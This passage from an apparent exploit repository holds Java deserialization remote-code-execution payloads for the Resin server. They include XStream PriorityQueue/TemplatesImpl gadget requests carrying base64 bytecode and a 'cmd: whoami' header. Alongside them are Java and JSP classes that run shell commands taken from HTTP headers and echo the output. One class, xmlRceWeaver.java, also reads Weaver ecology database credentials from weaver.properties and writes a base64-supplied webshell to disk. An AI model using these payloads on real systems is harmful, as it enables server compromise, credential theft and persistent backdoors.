JlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABJnZXRTZXJ2bGV0UmVzcG9uc2UBACEoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTsBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAE2phdmEvaW8vUHJpbnRXcml0ZXIBAAdwcmludGxuAQAFZmx1c2gBAAVjbG9zZQEACWdldEhlYWRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQADZXJyAQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEADWdldFByb3BlcnRpZXMBABgoKUxqYXZhL3V0aWwvUHJvcGVydGllczsBABRqYXZhL3V0aWwvUHJvcGVydGllcwEACHRvU3RyaW5nAQAIZ2V0Qnl0ZXMBAAQoKVtCAQAFKFtCKVYBAAtnZXRSZXNvdXJjZQEAIihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbmV0L1VSTDsBAAxqYXZhL25ldC9VUkwBAAdnZXRQYXRoAQATZ2V0UHJvdGVjdGlvbkRvbWFpbgEAIigpTGphdmEvc2VjdXJpdHkvUHJvdGVjdGlvbkRvbWFpbjsBAB5qYXZhL3NlY3VyaXR5L1Byb3RlY3Rpb25Eb21haW4BAA1nZXRDb2RlU291cmNlAQAcKClMamF2YS9zZWN1cml0eS9Db2RlU291cmNlOwEAGGphdmEvc2VjdXJpdHkvQ29kZVNvdXJjZQEAC2dldExvY2F0aW9uAQAQKClMamF2YS9uZXQvVVJMOwEACXN1YnN0cmluZwEAFShJKUxqYXZhL2xhbmcvU3RyaW5nOwEABXNwbGl0AQAnKExqYXZhL2xhbmcvU3RyaW5nOylbTGphdmEvbGFuZy9TdHJpbmc7AQAEdHJpbQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEAE2phdmEvbmlvL2ZpbGUvUGF0aHMBAANnZXQBADsoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9uaW8vZmlsZS9QYXRoOwEAE2phdmEvbmlvL2ZpbGUvRmlsZXMBAAxyZWFkQWxsQnl0ZXMBABgoTGphdmEvbmlvL2ZpbGUvUGF0aDspW0IBAAdpc0VtcHR5AQADKClaAQAMZGVjb2RlQnVmZmVyAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEABXdyaXRlAQAPcHJpbnRTdGFja1RyYWNlACEAUwBUAAEAVQAAAAUAAQBWAFcAAgBYAAAAzwADAAcAAABJuAABtgACEgO2AARNLBIFA70ABrYAB04tAQO9AAi2AAnAAAo6BBkEtgALwAAMOgUZBbkADQEAOgYZBiu2AA4ZBrYADxkGtgAQsQAAAAIAWQAAACYACQAAABUADAAWABcAFwAlABgALwAZADgAGgA+ABsAQwAcAEgAHQBaAAAASAAHAAAASQBbAFwAAAAAAEkAXQBeAAEADAA9AF8AYAACABcAMgBhAGIAAwAlACQAYwBkAAQALwAaAGUAZgAFADgAEQBnAGgABgBpAAAABAABAFEAAQBqAGsAAgBYAAADrAAFAAkAAAHqKrcAEbgAAbYAAhIDtgAETSwSBQO9AAa2AAdOLQEDvQAItgAJwAAKOgQZBBIStgATxgBzGQQSErYAEzoFEhS4ABW2ABYSF7YAGJkAGQa9ABlZAxIaU1kEEhtTWQUZBVOnABYGvQAZWQMSHFNZBBIdU1kFGQVTOga7AB5ZuwAfWRkGtwAgtgAhtgAitwAjEiS2ACW2ACZMsgAnEii2ACkqK7YAKhkEEiu2ABPGABu7ABlZuAAstgAttgAutwAvOgUqGQW2ACoZBBIwtgATxgCwuAABtgACEjG2ADK2ADM6BbgAAbYAAhI0tgAEOgYZBrYANbYANrYAN7YAMzoHKhkHBLYAOLYAKioZBQS2ADi2ACoZBRI5tgAYmQBluwA6WbcAOxkFBLYAOBI5tgA8AzK2AD22AD4SP7YAPrYAQDoHKrsAOlm3ADsSQbYAPhkHtgA+EkK2AD62AEC2ACoZBwO9ABm4AEO4AEQ6CCoSRbYAKiq7ABlZGQi3AC+2ACoZBBJGtgATOgUZBcYABwSnAAQDGQW2AEeaAAcEpwAEA36ZAEQZBBJItgATOgYZBsYANhkGtgBHmgAuuwBJWbcAShkGtgBLOge7AExZGQW3AE06CBkIGQe2AE4ZCLYATyoSULYAKqcACEwrtgBSsQABAAQB4QHkAFEAAwBZAAAAmgAmAAAAIAAEACQAEAAlABsAJgApACoAMwArADwALAB3AC0AlgAuAJ4ALwCjADIArQAzAL8ANADFADcAzwA4AN8AOwDsADwA/AA/AQYAQAEQAEIBGgBDAT4ARQFbAEYBaQBHAW8ASAF8AEwBhQBNAaAATgGpAE8BtgBQAcQAUQHPAFIB1gBTAdsAVAHhAFoB5ABYAeUAWQHpAFwAWgAAAKwAEQA8AGcAbABeAAUAdwAsAG0AbgAGAJYADQBvAF4AAQC/AAYAcABeAAUBaQATAHEAcgAIAN8AnQBzAF4ABQDsAJAAdABgAAYA/ACAAHUAXgAHAcQAHQBxAHIABwHPABIAdgB3AAgBqQA4AHgAXgAGABAB0QB5AGAAAgAbAcYAYQBiAAMAKQG4AGMAZAAEAYUAXAB1AF4ABQHlAAQAegB7AAEAAAHqAFsAXAAAAHwAAABWAAz/AGIABgcAfQAHAH4HAH8HAIAHAIEAAFIHAIL6AC0h+wC2/AARBwCBQAFLAf8AAAAGBwB9AAcAfgcAfwcAgAcAgQACAQH/AEQAAQcAfQAAQgcAgwQAaQAAAAQAAQBRAAEAhACFAAIAWAAAAD8AAAADAAAAAbEAAAACAFkAAAAGAAEAAABhAFoAAAAgAAMAAAABAFsAXAAAAAAAAQCGAIcAAQAAAAEAiACJAAIAaQAAAAQAAQCKAAEAhACLAAIAWAAAAEkAAAAEAAAAAbEAAAACAFkAAAAGAAEAAABtAFoAAAAqAAQAAAABAFsAXAAAAAAAAQCGAIcAAQAAAAEAjACNAAIAAAABAI4AjwADAGkAAAAEAAEAigAJAJAAkQABAFgAAAArAAAAAQAAAAGxAAAAAgBZAAAABgABAAAAcQBaAAAADAABAAAAAQCSAG4AAAABAJMAAAACAJQ=</byte-array>
30 | </__bytecodes>
31 | <__transletIndex>-1</__transletIndex>
32 | <__indentNumber>0</__indentNumber>
33 | </default>
34 | <boolean>false</boolean>
35 | </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
36 | </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
37 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
38 | </java.util.PriorityQueue>
39 | </java.util.PriorityQueue>
40 | 2
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/Resin/code/resinEcho.java:
--------------------------------------------------------------------------------
1 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
2 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
3 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
4 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
5 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
6 | import com.caucho.server.http.HttpResponse;
7 | import java.util.Scanner;
8 |
9 | public class resinEcho extends AbstractTranslet {
10 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
11 |
12 | }
13 |
14 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
15 | }
16 |
17 | public resinEcho() throws Exception {
18 | Class clazz = Thread.currentThread().getClass();
19 | java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
20 | field.setAccessible(true);
21 | Object obj = field.get(Thread.currentThread());
22 | field = obj.getClass().getDeclaredField("table");
23 | field.setAccessible(true);
24 | obj = field.get(obj);
25 | Object[] obj_arr = (Object[]) obj;
26 | for(int i = 0; i < obj_arr.length; i++) {
27 | Object o = obj_arr[i];
28 | if (o == null) continue;
29 | field = o.getClass().getDeclaredField("value");
30 | field.setAccessible(true);
31 | obj = field.get(o);
32 | if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
33 | com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
34 | String cmd = httpRequest.getHeader("cmd");
35 |
36 | if(cmd != null && !cmd.isEmpty()){
37 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"sh", "-c", cmd};
38 |
39 | // String res = new java.util.Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
40 | String res = new Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();
41 |
42 | HttpResponse httpResponse = httpRequest.createResponse();
43 |
44 | httpResponse.setHeader("Content-Length", res.length() + "");
45 | java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
46 | method.setAccessible(true);
47 | com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
48 | httpResponseStream.write(res.getBytes(), 0, res.length());
49 | httpResponseStream.close();
50 | }
51 |
52 | break;
53 | }
54 | }
55 | }
56 |
57 | public static void main(String[] args) {
58 |
59 | }
60 | }
61 |
62 |
--------------------------------------------------------------------------------
/Resin/code/resinEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
8 | field = obj.getClass().getDeclaredField("table");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Object[] obj_arr = (Object[]) obj;
13 | for(int i = 0; i < obj_arr.length; i++) {
14 | Object o = obj_arr[i];
15 | if (o == null) continue;
16 |
17 | field = o.getClass().getDeclaredField("value");
18 | field.setAccessible(true);
19 | obj = field.get(o);
20 |
21 | if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
22 | com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
23 | String cmd = httpRequest.getHeader("cmd");
24 |
25 | if(cmd != null && !cmd.isEmpty()){
26 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
27 | com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
28 | httpResponse.setHeader("Content-Length", res.length() + "");
29 | java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
30 | method.setAccessible(true);
31 | com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
32 | httpResponseStream.write(res.getBytes(), 0, res.length());
33 | httpResponseStream.close();
34 | }
35 |
36 | break;
37 | }
38 | }
39 | %>
--------------------------------------------------------------------------------
/Resin/code/resinEcho.xml:
--------------------------------------------------------------------------------
1 | POST /services%20/WorkflowServiceXml HTTP/1.1
2 | Host: 127.0.0.1:8080
3 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
4 | Content-Type: text/xml
5 | cmd: whoami
6 | Content-Length: 6581
7 | Connection: close
8 |
9 |
10 |
11 |
12 |
13 | <java.util.PriorityQueue serialization="custom">
14 | <unserializable-parents/>
15 | <java.util.PriorityQueue>
16 | <default>
17 | <size>2</size>
18 | <comparator class="org.apache.commons.beanutils.BeanComparator">
19 | <property>outputProperties</property>
20 | <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/>
21 | </comparator>
22 | </default>
23 | <int>3</int>
24 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
25 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
26 | <default>
27 | <__name>a</__name>
28 | <__bytecodes>
29 | <byte-array>yv66vgAAADMA7QoAOQB0CgB1AHYKAHcAeAoAeQB6CAB7CgB5AHwKAH0AfgoAfQB/CACABwBlCACBCgB5AIIIAIMKABgAhAcAhQgAWgoADwCGCgAYAIcIAIgKAIkAigoAGACLCACMCgAYAI0HAI4IAI8IAJAIAJEIAJIHAJMHAJQKAB4AlQoAHgCWCgCXAJgKAB0AmQgAmgoAHQCbCgAdAJwKAA8AnQgAngcAnwoAKAB0CgAYAKAKACgAoQgAogoAKACjCgAoAKQKAKUApggApwoAeQCoCgCpAH4KAKkAqgcAqwoAGACsCgA0AK0KADQArgcArwcAsAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQALTHJlc2luRWNobzsBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAsQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAGPGluaXQ+AQADKClWAQAEY21kcwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAANyZXMBABJMamF2YS9sYW5nL1N0cmluZzsBAAxodHRwUmVzcG9uc2UBACVMY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwUmVzcG9uc2U7AQAGbWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABJodHRwUmVzcG9uc2VTdHJlYW0BACtMY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwUmVzcG9uc2VTdHJlYW07AQALaHR0cFJlcXVlc3QBACRMY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwUmVxdWVzdDsBAANjbWQBAAFvAQASTGphdmEvbGFuZy9PYmplY3Q7AQABaQEAAUkBAAVjbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQADb2JqAQAHb2JqX2FycgEAE1tMamF2YS9sYW5nL09iamVjdDsBAA1TdGFja01hcFRhYmxlBwCvBwCyBwCzBwC0BwCFBwCOBwBPBwC1AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQAKU291cmNlRmlsZQEADnJlc2luRWNoby5qYXZhDABMAE0HALYMALcAuAcAtAwAuQC6BwCyDAC7ALoBAAx0aHJlYWRMb2NhbHMMALwAvQcAswwAvgC/DADAAMEBAAV0YWJsZQEABXZhbHVlDADCAMMBACJjb20uY2F1Y2hvLnNlcnZlci5odHRwLkh0dHBSZXF1ZXN0DADEAMUBACJjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBSZXF1ZXN0DADGAMcMAMgAyQEAB29zLm5hbWUHAMoMAMsAxwwAzADDAQAGd2luZG93DADNAM4BABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jAQACc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABMAHAMAM8A0AcA0QwA0gDTDABMANQBAAJcQQwA1QDWDADXAMMMANgA2QEADkNvbnRlbnQtTGVuZ3RoAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMANoA2wwA3ADdAQAADADcAN4MAN8AwwcA4AwA4QDiAQAUY3JlYXRlUmVzcG9uc2VTdHJlYW0MAOMA5AcA5QwA5gDnAQApY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwUmVzcG9uc2VTdHJlYW0MAOgA6QwA6gDrDADsAE0BAAlyZXNpbkVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAPamF2YS9sYW5nL0NsYXNzAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvT2JqZWN0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAA1nZXRTdXBlcmNsYXNzAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAB2lzRW1wdHkBAAMoKVoBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQAOY3JlYXRlUmVzcG9uc2UBACcoKUxjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBSZXNwb25zZTsBAAZsZW5ndGgBAAMoKUkBAAZhcHBlbmQBABwoSSlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBACNjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBSZXNwb25zZQEACXNldEhlYWRlcgEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZzspVgEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACGdldEJ5dGVzAQAEKClbQgEABXdyaXRlAQAHKFtCSUkpVgEABWNsb3NlACEAOAA5AAAAAAAEAAEAOgA7AAIAPAAAAD8AAAADAAAAAbEAAAACAD0AAAAGAAEAAAAMAD4AAAAgAAMAAAABAD8AQAAAAAAAAQBBAEIAAQAAAAEAQwBEAAIARQAAAAQAAQBGAAEAOgBHAAIAPAAAAEkAAAAEAAAAAbEAAAACAD0AAAAGAAEAAAAPAD4AAAAqAAQAAAABAD8AQAAAAAAAAQBBAEIAAQAAAAEASABJAAIAAAABAEoASwADAEUAAAAEAAEARgABAEwATQACADwAAAK7AAUADgAAAV8qtwABuAACtgADTCu2AAQSBbYABk0sBLYAByy4AAK2AAhOLbYAAxIJtgAGTSwEtgAHLC22AAhOLcAACsAACjoEAzYFFQUZBL6iARYZBBUFMjoGGQbHAAanAQEZBrYAAxILtgAGTSwEtgAHLBkGtgAITi3GAOYttgADtgAMEg22AA6ZANctwAAPOgcZBxIQtgAROggZCMYAyRkItgASmgDBEhO4ABS2ABUSFrYAF5kAGQa9ABhZAxIZU1kEEhpTWQUZCFOnABYGvQAYWQMSG1NZBBIcU1kFGQhTOgm7AB1ZuwAeWRkJtwAftgAgtgAhtwAiEiO2ACS2ACU6ChkHtgAmOgsZCxInuwAoWbcAKRkKtgAqtgArEiy2AC22AC62AC8ZC7YAAxIwAbYAMToMGQwEtgAyGQwZCwG2ADPAADQ6DRkNGQq2ADUDGQq2ACq2ADYZDbYAN6cACYQFAaf+6LEAAAADAD0AAAB+AB8AAAARAAQAEgALABMAFQAUABoAFQAiABYALAAXADEAGAA3ABkAQAAaAEsAGwBSABwAWgAdAGUAHgBqAB8AcQAgAIQAIQCKACIAkwAkAKAAJQDbACgA+wAqAQIALAEgAC0BLQAuATMALwFAADABUAAxAVUAMgFYABoBXgA3AD4AAACOAA4A2wB6AE4ATwAJAPsAWgBQAFEACgECAFMAUgBTAAsBLQAoAFQAVQAMAUAAFQBWAFcADQCKAM4AWABZAAcAkwDFAFoAUQAIAFIBBgBbAFwABgBDARsAXQBeAAUAAAFfAD8AQAAAAAsBVABfAGAAAQAVAUoAYQBiAAIAIgE9AGMAXAADAEABHwBkAGUABABmAAAAMgAG/wBDAAYHAGcHAGgHAGkHAGoHAAoBAAD8ABYHAGr9AGsHAGsHAGxSBwBt+AB++gAFAEUAAAAEAAEAbgAJAG8AcAABADwAAAArAAAAAQAAAAGxAAAAAgA9AAAABgABAAAAOwA+AAAADAABAAAAAQBxAE8AAAABAHIAAAACAHM=</byte-array>
30 | </__bytecodes>
31 | <__transletIndex>-1</__transletIndex>
32 | <__indentNumber>0</__indentNumber>
33 | </default>
34 | <boolean>false</boolean>
35 | </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
36 | </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
37 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
38 | </java.util.PriorityQueue>
39 | </java.util.PriorityQueue>
40 | 2
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/Resin/code/xmlRceWeaver.java:
--------------------------------------------------------------------------------
1 | import com.caucho.server.http.HttpServletRequestImpl;
2 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
3 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
4 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
5 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
6 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
7 | import sun.misc.BASE64Decoder;
8 |
9 | import java.io.FileOutputStream;
10 | import java.io.PrintWriter;
11 | import java.io.Serializable;
12 | import java.lang.reflect.Method;
13 | import java.nio.file.Files;
14 | import java.nio.file.Paths;
15 | import java.util.Scanner;
16 | import javax.servlet.http.HttpServletResponse;
17 |
18 | public class xmlRceWeaver extends AbstractTranslet implements Serializable {
19 |
20 | public void showRespose(String var1) throws Exception {
21 | Class si = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation");
22 | Method getContextRequest = si.getMethod("getContextRequest");
23 | HttpServletRequestImpl req = (HttpServletRequestImpl) getContextRequest.invoke((Object) null);
24 | HttpServletResponse rep = (HttpServletResponse) req.getServletResponse();
25 | PrintWriter out = rep.getWriter();
26 | out.println(var1);
27 | out.flush();
28 | out.close();
29 | return;
30 | }
31 |
32 | public xmlRceWeaver() throws Exception {
33 | try {
34 | String Cmdcontext;
35 |
36 | Class ServletInvocation = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation");
37 | Method getContextRequest = ServletInvocation.getMethod("getContextRequest");
38 | HttpServletRequestImpl req = (HttpServletRequestImpl) getContextRequest.invoke((Object) null);
39 |
40 |
41 | //执行系统命令
42 | if (req.getHeader("Session") != null) {
43 | String cmd = req.getHeader("Session");
44 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"sh", "-c", cmd};
45 | Cmdcontext = new Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();
46 | System.err.println("This is an error message.");
47 | this.showRespose(Cmdcontext);
48 | }
49 | //输出jdk 环境变量
50 | if (req.getHeader("Echo") != null) {
51 | String echoinfo = new String(System.getProperties().toString().getBytes());
52 | this.showRespose(echoinfo);
53 | }
54 | // 获取web当前路径
55 | if (req.getHeader("ShowPath") != null) {
56 | String contextPath = Thread.currentThread().getContextClassLoader().getResource("").getPath();
57 | // d:/WEAVER/ecology/classbean/
58 |
59 | Class cls = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.http.HttpServletRequestImpl");
60 | String path = cls.getProtectionDomain().getCodeSource().getLocation().getPath();
61 | // D:/WEAVER/Resin/lib/resin.jar
62 |
63 | this.showRespose(path.substring(1));
64 | this.showRespose(contextPath.substring(1));
65 | // 获取数据库路径
66 | if (contextPath.contains("ecology")) {
67 | path = contextPath.substring(1).split("ecology")[0].trim() + "ecology/WEB-INF/prop/weaver.properties";
68 | //读取数据库内容
69 | this.showRespose("\n[+]weaver database path: \n" + path + "\n");
70 | byte[] bytes = Files.readAllBytes(Paths.get(path));
71 | this.showRespose("[+] weaver database success:");
72 | this.showRespose(new String(bytes));
73 | }
74 | }
75 | // header 写webshell
76 | String path = req.getHeader("WPath");
77 | if (path != null & !path.isEmpty()) {
78 | String content = req.getHeader("WContent");
79 | if (content != null && !content.isEmpty()) {
80 | byte[] bytes = (new BASE64Decoder()).decodeBuffer(content);
81 | FileOutputStream fileOutputStream = new FileOutputStream(path);
82 | fileOutputStream.write(bytes);
83 | fileOutputStream.close();
84 | this.showRespose("[+] Write Success");
85 | }
86 | }
87 |
88 | } catch (Exception var6) {
89 | var6.printStackTrace();
90 | }
91 |
92 | }
93 |
94 | @Override
95 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
96 |
97 | }
98 |
99 | /**
100 | * Main transform() method - this is overridden by the compiled translet
101 | *
102 | * @param document
103 | * @param iterator
104 | * @param handler
105 | */
106 | @Override
107 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
108 |
109 | }
110 |
111 | public static void main(String[] args) {
112 |
113 | }
114 | }
115 |
--------------------------------------------------------------------------------
/Resin/img/001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Resin/img/001.png
--------------------------------------------------------------------------------
/Resin/img/002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Resin/img/002.png
--------------------------------------------------------------------------------
/Resin/img/003.png:
--------------------------------------------------------------------------------
